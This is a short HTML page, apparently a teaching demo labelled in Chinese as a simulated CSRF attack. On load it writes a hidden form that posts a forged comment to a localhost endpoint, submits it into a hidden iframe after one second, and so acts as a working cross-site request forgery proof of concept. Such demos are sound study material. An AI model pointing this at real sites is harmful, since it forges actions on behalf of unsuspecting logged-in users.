<!DOCTYPE html>
<html>
  <head>
    
    <meta charset="utf-8">
  </head>
  <body>
    CSRF模拟攻击
    <script>
      document.write(`
      <form name="form" action="http://localhost:3000/updateText" method="post" target=“csrf”>
        添加评论: <input type="text" name="text" value="CSRF评论。。" />
      </form>
      `)
      var iframe = document.createElement('iframe')
      iframe.name = 'csrf'
      iframe.style.display = 'none'
      document.body.appendChild(iframe)
      setTimeout(function() {
        document.querySelector('form').submit();
      },1000)
    </script>
  </body>
</html>